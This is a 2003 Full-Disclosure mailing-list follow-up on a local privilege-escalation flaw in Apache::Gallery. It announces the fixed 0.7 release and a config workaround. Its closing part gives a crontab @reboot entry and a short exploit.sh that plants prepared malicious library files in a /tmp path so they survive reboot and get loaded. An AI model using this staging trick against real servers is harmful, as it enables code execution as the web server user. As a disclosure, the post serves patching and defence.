Re: Apache::Gallery local webserver compromise, privilege escalation

[Jon Hart <warchild () spoofed org>]

On Mon, Sep 08, 2003 at 08:21:13PM -0400, Jon Hart wrote:
> Thanks to Michael Legart, Andreas Plesner and the rest of the
> Apache::Gallery team for a prompt response and fix.  You can get the latest
> version of Apache::Gallery which fixes this problem by removing Inline::C
> at:
>
>       http://svn.apachegallery.dk/snapshots/

Just as a quick follow up,

A::G 0.7 has been released, which includes among other things the
removal of Inline::C.

If upgrading to 0.7 is not possible, simply change the call to Inline on
line 27 of Gallery.pm to something like:

use Inline (C => Config => 
            LIBS => '-L/usr/X11R6/lib -lImlib2 -lm -ldl -lXext -lXext',
            INC => '-I/usr/X11R6/include',
            UNTAINT => 1,
            DIRECTORY => "/some/path/" 
          );

Where /some/path is a "secure" path that only the user the gallery runs
as has access to, like $apacheroot/gallery/Inline.  Of course this isn't
the most elegant fix, but it will save you if 0.7 isn't possible or
desirable.

Thanks to a tip from a colleague of mine, the following entry in crontab
will help you to beat the race condition of getting the files removed:

        @reboot /path/to/exploit/exploit.sh

Where exploit.sh contains something like:

        #!/bin/sh
        mkdir -p /tmp/lib/auto/Apache/Gallery_4033
        cp ~/exploits/Gallery* /tmp/lib/auto/Apache/Gallery_4033

The next time the machine is rebooted, as soon as cron is started, your
exploit script will be run.  This should work on most Linux
distributions.

-jon

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html